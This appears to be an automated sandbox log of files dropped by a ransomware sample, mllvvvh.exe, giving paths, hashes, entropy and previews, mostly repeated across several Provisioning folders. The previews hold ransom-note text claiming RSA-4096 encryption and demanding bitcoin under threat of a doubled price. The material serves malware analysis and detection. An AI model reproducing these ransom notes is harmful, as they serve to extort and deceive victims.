                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{c5dc3753-b6c8-4057-b396-bf13d769311c}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{c8a326e4-f518-4f14-b543-97a57e1a975e}\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):31424
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VS+
                  MD5:BCA5CE1B0198FF84B220280D8AD04BE0
                  SHA1:0F2A973D9EE69C964755B5BA001B2CDDEE72FD4C
                  SHA-256:1109A213B37B3E2A055C9265CC42226FAC84B723B58E898BCD382DEC22AF65CF
                  SHA-512:FCCA1EAFC553ED95D4011D4387C2435D7B0E4D7B50E791FB90B8CE670B34D50B1071C62504A16A4189FA0CC337A0BEEBB406EE034C568DAFC4AAFFF1056EAE98
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):271008
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifA
                  MD5:37C2E1A10DB5F9C0222F3430391A87C4
                  SHA1:DB9C8F1EA3ABAEAFD974507E66E0047852680D15
                  SHA-256:C0862DB7C0F93BD961F41DC92709FE4ECAFD3A4C0BC2CE8023D16995D007CA87
                  SHA-512:144016408E5A23DF8CD509EBA8AE45756FD6C68884ACD88DD3F023A049909E491E60D99569E66A91B54F53D54A6A79FFEF6B89D16ED1BAF5C3811F6AA4FE20D1
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\RunTime\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):8388
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5u
                  MD5:8030E2957B3B2A6685152C405FF4388D
                  SHA1:30E1832D030C7AD1C692924707ACE545637F12F0
                  SHA-256:1B7333F5CCE4CA0D51CB2E15717421ED84DDFE684DD264A3C750B240F7ADD4C2
                  SHA-512:DD6A7C9685A84743044BD8AA00A6C71B68E8B0257593EF43F4B7D9A735FCB373C4433EB3C893072764E1A9F752DFADED2AE17A8D44D83D174877F5F91B836980
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\Prov\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Provisioning\{ee4aac98-c174-4941-82b1-d121e493e4fb}\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
